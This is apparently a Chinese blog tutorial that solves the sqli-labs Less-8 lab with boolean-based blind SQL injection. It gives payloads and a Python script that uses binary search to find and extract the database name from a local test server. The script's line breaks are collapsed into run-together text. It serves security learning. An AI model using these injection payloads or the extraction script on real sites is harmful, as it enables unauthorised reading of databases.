目录

​编辑

判断库名

1.库名长度

2.库名

---

import requests
import mathurl = "http://127.0.0.1/Less-8"def dblength():for i in range(20):payload = f"1' and length(database())>{i}-- "data = {'id': payload}res = requests.get(url, params=data)if 'You are in...........' not in res.text:return idef dbname():dbname = ''length = dblength()for i in range(1, length + 1):low = 32high = 126flag = 0while low <= high:mid = (low + high) // 2payload = f"1' and ascii(substr(database(),{i},1))>{mid}-- "data = {'id': payload}res = requests.get(url, params=data)if 'You are in...........' in res.text:low = midelse:high = midif mid == flag:dbname += chr(math.floor(mid + 1))breakflag = midprint(dbname)return dbnameprint('dbname is', dbname())

判断库名

1.库名长度

当大于一个不存在的长度的时候，就不会回显：

        

但是这个长度存在的话，会返回一个"You are in........."：

        

所以payload是1' and length(database())>{i}--+

def length():for i in range(20):payload = f"1' and length(database())>{i}-- "data = {'id': payload}res = requests.get(url, params=data)if 'You are in...........' not in res.text:return i

2.库名

长度已经得出来了,然后就一个字符一个字符的判断是什么：

payload：1' and ascii(substr(database(),1,1))>33--+

1.用ascll码对应字母数字，且范围是32-126

2.当没有返回值的时候就说明等于而不是大于，就得出值了。

3.加上二分法判断，比直接遍历要快